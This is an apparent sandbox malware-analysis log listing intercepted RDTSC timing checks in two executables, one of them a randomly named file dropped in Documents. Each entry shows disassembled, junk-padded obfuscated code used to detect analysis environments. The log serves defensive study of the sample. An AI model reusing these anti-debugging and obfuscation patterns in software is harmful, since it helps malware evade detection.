Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B508BB second address: 4B50909 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 pushad 0x0000000a pushad 0x0000000b mov edx, 6C328D2Eh 0x00000010 mov ah, dl 0x00000012 popad 0x00000013 pushfd 0x00000014 jmp 00007F44646ECA50h 0x00000019 sub cx, 1B78h 0x0000001e jmp 00007F44646ECA4Bh 0x00000023 popfd 0x00000024 popad 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F44646ECA55h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50909 second address: 4B5093B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4465131BD8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5093B second address: 4B5094A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA4Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5094A second address: 4B5097A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F4465131BCFh 0x00000008 push ecx 0x00000009 pop ebx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebx 0x0000000e jmp 00007F4465131BD2h 0x00000013 leave 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 mov cl, 03h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B5097A second address: 4B50475 instructions: 0x00000000 rdtsc 0x00000002 mov eax, ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushfd 0x00000007 jmp 00007F44646ECA55h 0x0000000c adc esi, 4ECFC196h 0x00000012 jmp 00007F44646ECA51h 0x00000017 popfd 0x00000018 popad 0x00000019 retn 0008h 0x0000001c cmp dword ptr [ebp-2Ch], 10h 0x00000020 mov eax, dword ptr [ebp-40h] 0x00000023 jnc 00007F44646ECA45h 0x00000025 push eax 0x00000026 lea edx, dword ptr [ebp-00000590h] 0x0000002c push edx 0x0000002d call esi 0x0000002f push 00000008h 0x00000031 pushad 0x00000032 mov di, ax 0x00000035 push esi 0x00000036 pushfd 0x00000037 jmp 00007F44646ECA57h 0x0000003c adc eax, 0BF78E8Eh 0x00000042 jmp 00007F44646ECA59h 0x00000047 popfd 0x00000048 pop eax 0x00000049 popad 0x0000004a push 3B19AC12h 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 pushfd 0x00000053 jmp 00007F44646ECA59h 0x00000058 xor ecx, 2F5DB176h 0x0000005e jmp 00007F44646ECA51h 0x00000063 popfd 0x00000064 pushfd 0x00000065 jmp 00007F44646ECA50h 0x0000006a sub ah, FFFFFF98h 0x0000006d jmp 00007F44646ECA4Bh 0x00000072 popfd 0x00000073 popad 0x00000074 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A6D second address: 4B50A74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ecx, ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50A74 second address: 4B50AD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F44646ECA52h 0x00000008 pushfd 0x00000009 jmp 00007F44646ECA52h 0x0000000e sbb cx, B7F8h 0x00000013 jmp 00007F44646ECA4Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d pushad 0x0000001e movsx edx, ax 0x00000021 mov eax, 4AFF3F27h 0x00000026 popad 0x00000027 xchg eax, ebp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F44646ECA54h 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 4B50AD4 second address: 4B50AE3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331EC4 second address: 331EC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331EC9 second address: 331ED1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED1 second address: 331ED5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED5 second address: 331ED9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331ED9 second address: 331F13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F44646ECA55h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 pop edi 0x00000015 push eax 0x00000016 push edx 0x00000017 js 00007F44646ECA46h 0x0000001d jmp 00007F44646ECA4Dh 0x00000022 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331F13 second address: 331F1F instructions: 0x00000000 rdtsc 0x00000002 ja 00007F4465131BC6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331F1F second address: 331F4D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F44646ECA46h 0x00000009 jmp 00007F44646ECA53h 0x0000000e pop esi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F44646ECA4Ah 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 32053D second address: 320543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 330F62 second address: 330F67 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 331221 second address: 331250 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F4465131BC6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jc 00007F4465131BD2h 0x00000010 js 00007F4465131BC6h 0x00000016 jo 00007F4465131BC6h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4465131BCBh 0x00000023 jo 00007F4465131BC6h 0x00000029 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334101 second address: 334107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334107 second address: 3341E5 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jbe 00007F4465131BD0h 0x0000000f nop 0x00000010 jng 00007F4465131BD7h 0x00000016 push 00000000h 0x00000018 mov edi, 72E9E73Dh 0x0000001d push 5B00A2B2h 0x00000022 pushad 0x00000023 pushad 0x00000024 jmp 00007F4465131BD1h 0x00000029 jp 00007F4465131BC6h 0x0000002f popad 0x00000030 ja 00007F4465131BC8h 0x00000036 push ebx 0x00000037 pop ebx 0x00000038 popad 0x00000039 xor dword ptr [esp], 5B00A232h 0x00000040 jmp 00007F4465131BCAh 0x00000045 push 00000003h 0x00000047 mov ecx, dword ptr [ebp+122D1DF2h] 0x0000004d push 00000000h 0x0000004f add cx, 3672h 0x00000054 push 00000003h 0x00000056 stc 0x00000057 push 6A667213h 0x0000005c pushad 0x0000005d jnp 00007F4465131BC8h 0x00000063 jmp 00007F4465131BD3h 0x00000068 popad 0x00000069 add dword ptr [esp], 55998DEDh 0x00000070 lea ebx, dword ptr [ebp+12448FDEh] 0x00000076 mov esi, dword ptr [ebp+122D3966h] 0x0000007c or esi, dword ptr [ebp+122D3BD2h] 0x00000082 xchg eax, ebx 0x00000083 ja 00007F4465131BD4h 0x00000089 jmp 00007F4465131BCEh 0x0000008e push eax 0x0000008f jnp 00007F4465131BD4h 0x00000095 push eax 0x00000096 push edx 0x00000097 pushad 0x00000098 popad 0x00000099 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334230 second address: 334269 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov dword ptr [esp], eax 0x00000008 jmp 00007F44646ECA50h 0x0000000d push 00000000h 0x0000000f call 00007F44646ECA49h 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F44646ECA53h 0x0000001c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334269 second address: 334282 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BD2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334282 second address: 3342D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F44646ECA46h 0x0000000a popad 0x0000000b popad 0x0000000c push eax 0x0000000d jnc 00007F44646ECA60h 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 jnp 00007F44646ECA4Eh 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 push ebx 0x00000022 jmp 00007F44646ECA4Dh 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3342D4 second address: 3342F9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCCh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push edi 0x00000010 jmp 00007F4465131BCDh 0x00000015 pop edi 0x00000016 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3342F9 second address: 334311 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F44646ECA54h 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334311 second address: 334315 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334315 second address: 33436F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007F44646ECA48h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 push 00000003h 0x00000025 mov edx, dword ptr [ebp+122D39EEh] 0x0000002b push 00000000h 0x0000002d mov ch, 46h 0x0000002f mov ecx, 0B8F5166h 0x00000034 push 00000003h 0x00000036 mov ecx, dword ptr [ebp+122D3C36h] 0x0000003c push 4EFF0337h 0x00000041 push eax 0x00000042 push edx 0x00000043 ja 00007F44646ECA4Ch 0x00000049 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 33436F second address: 3343BF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F4465131BCCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 7100FCC9h 0x00000011 push 00000000h 0x00000013 push edx 0x00000014 call 00007F4465131BC8h 0x00000019 pop edx 0x0000001a mov dword ptr [esp+04h], edx 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edx 0x00000027 push edx 0x00000028 ret 0x00000029 pop edx 0x0000002a ret 0x0000002b mov edx, dword ptr [ebp+122D2C2Dh] 0x00000031 mov edi, dword ptr [ebp+122D3926h] 0x00000037 lea ebx, dword ptr [ebp+12448FE7h] 0x0000003d movzx edx, ax 0x00000040 mov cl, dl 0x00000042 xchg eax, ebx 0x00000043 push ebx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343BF second address: 3343D0 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F44646ECA46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343D0 second address: 3343D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3343D7 second address: 3343E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334452 second address: 334456 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 33451B second address: 334567 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA4Bh 0x00000009 popad 0x0000000a mov eax, dword ptr [eax] 0x0000000c push ecx 0x0000000d pushad 0x0000000e jmp 00007F44646ECA53h 0x00000013 jnl 00007F44646ECA46h 0x00000019 popad 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], eax 0x0000001f push eax 0x00000020 push edx 0x00000021 jne 00007F44646ECA57h 0x00000027 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 334567 second address: 33459A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 sbb edx, 4979BE05h 0x0000000f lea ebx, dword ptr [ebp+12448FF2h] 0x00000015 sub dword ptr [ebp+122D27A0h], esi 0x0000001b xchg eax, ebx 0x0000001c pushad 0x0000001d pushad 0x0000001e jbe 00007F4465131BC6h 0x00000024 jng 00007F4465131BC6h 0x0000002a popad 0x0000002b push eax 0x0000002c push edx 0x0000002d je 00007F4465131BC6h 0x00000033 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3544DA second address: 3544E4 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F44646ECA52h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3544E4 second address: 3544EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35248B second address: 352491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352491 second address: 352495 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352495 second address: 3524A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3524A1 second address: 3524A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3524A5 second address: 3524A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3525BF second address: 3525F6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4465131BD4h 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F4465131BCBh 0x00000012 jmp 00007F4465131BD0h 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352894 second address: 352898 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352898 second address: 3528C1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jc 00007F4465131BC6h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 popad 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F4465131BC6h 0x0000001c jmp 00007F4465131BCDh 0x00000021 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3528C1 second address: 3528CB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3528CB second address: 3528DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCFh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B4A second address: 352B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B50 second address: 352B58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 352B58 second address: 352B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35337E second address: 353384 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 353384 second address: 353388 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 353388 second address: 35338E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35338E second address: 3533C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 js 00007F44646ECA5Fh 0x0000000c popad 0x0000000d pushad 0x0000000e jmp 00007F44646ECA4Bh 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 3533C4 second address: 3533D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4465131BCEh 0x00000009 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347AEF second address: 347AF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F44646ECA46h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347AF9 second address: 347B30 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4465131BCDh 0x00000007 jmp 00007F4465131BCCh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F4465131BD6h 0x00000014 push edi 0x00000015 pop edi 0x00000016 pop edx 0x00000017 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B30 second address: 347B64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F44646ECA54h 0x00000007 push eax 0x00000008 pushad 0x00000009 popad 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pop eax 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F44646ECA51h 0x00000016 push ecx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B64 second address: 347B6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop ecx 0x00000007 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B6B second address: 347B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B71 second address: 347B75 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 347B75 second address: 347B91 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F44646ECA4Ch 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F44646ECA46h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 321FF0 second address: 321FF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 321FF4 second address: 322008 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F44646ECA4Bh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 322008 second address: 322010 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35CDA9 second address: 35CDAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35CDAD second address: 35CDB3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3A1 second address: 35D3B2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3B2 second address: 35D3B7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3B7 second address: 35D3BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3BC second address: 35D3C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D3C2 second address: 35D3CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 pushad 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCB8 second address: 35BCBD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCBD second address: 35BCCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push esi 0x0000000b pushad 0x0000000c popad 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCCB second address: 35BCD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F4465131BC6h 0x0000000a rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35BCD5 second address: 35BCD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D519 second address: 35D51E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Documents\JDGIECGIEB.exe	RDTSC instruction interceptor: First address: 35D51E second address: 35D54D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F44646ECA50h 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jl 00007F44646ECA4Ch 0x00000014 je 00007F44646ECA46h 0x0000001a pop ecx 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 rdtsc
